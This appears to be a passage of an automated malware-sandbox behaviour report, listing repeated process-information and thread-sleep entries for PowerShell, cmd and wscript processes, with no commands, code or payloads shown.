Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6492 |
Thread sleep count: 7091 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3200 |
Thread sleep count: 2620 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3528 |
Thread sleep time: -23980767295822402s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5864 |
Thread sleep count: 1056 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984 |
Thread sleep count: 133 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5408 |
Thread sleep count: 8189 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5320 |
Thread sleep count: 1433 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5048 |
Thread sleep time: -24903104499507879s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6812 |
Thread sleep count: 1446 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4912 |
Thread sleep count: 137 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5364 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8248 |
Thread sleep count: 6419 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368 |
Thread sleep time: -23980767295822402s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8248 |
Thread sleep count: 3266 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868 |
Thread sleep count: 943 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8296 |
Thread sleep count: 103 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4952 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8372 |
Thread sleep count: 2006 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8392 |
Thread sleep count: 237 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8336 |
Thread sleep time: -2767011611056431s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8376 |
Thread sleep time: -30000s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8772 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8760 |
Thread sleep count: 745 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9004 |
Thread sleep count: 3916 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8828 |
Thread sleep time: -3689348814741908s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9004 |
Thread sleep count: 103 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8736 |
Thread sleep time: -30000s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9036 |
Thread sleep time: -1844674407370954s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716 |
Thread sleep count: 651 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9168 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8588 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356 |
Thread sleep count: 424 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3144 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536 |
Thread sleep count: 7223 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444 |
Thread sleep time: -17524406870024063s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460 |
Thread sleep count: 521 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 824 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5688 |
Thread sleep count: 739 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264 |
Thread sleep time: -1844674407370954s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804 |
Thread sleep count: 5266 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668 |
Thread sleep time: -15679732462653109s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8844 |
Thread sleep count: 125 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5848 |
Thread sleep time: -30000s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8860 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036 |
Thread sleep count: 961 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8980 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8224 |
Thread sleep count: 6116 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5512 |
Thread sleep time: -23058430092136925s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1952 |
Thread sleep count: 2873 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8784 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3092 |
Thread sleep time: -30000s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6816 |
Thread sleep count: 565 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308 |
Thread sleep count: 262 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1724 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 |
Thread sleep count: 6717 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824 |
Thread sleep count: 3003 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4448 |
Thread sleep time: -23980767295822402s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 636 |
Thread sleep count: 498 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1852 |
Thread sleep count: 259 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2740 |
Thread sleep count: 4455 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4780 |
Thread sleep time: -20291418481080494s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2740 |
Thread sleep count: 3436 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8988 |
Thread sleep count: 1000 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1976 |
Thread sleep time: -922337203685477s >= -30000s |
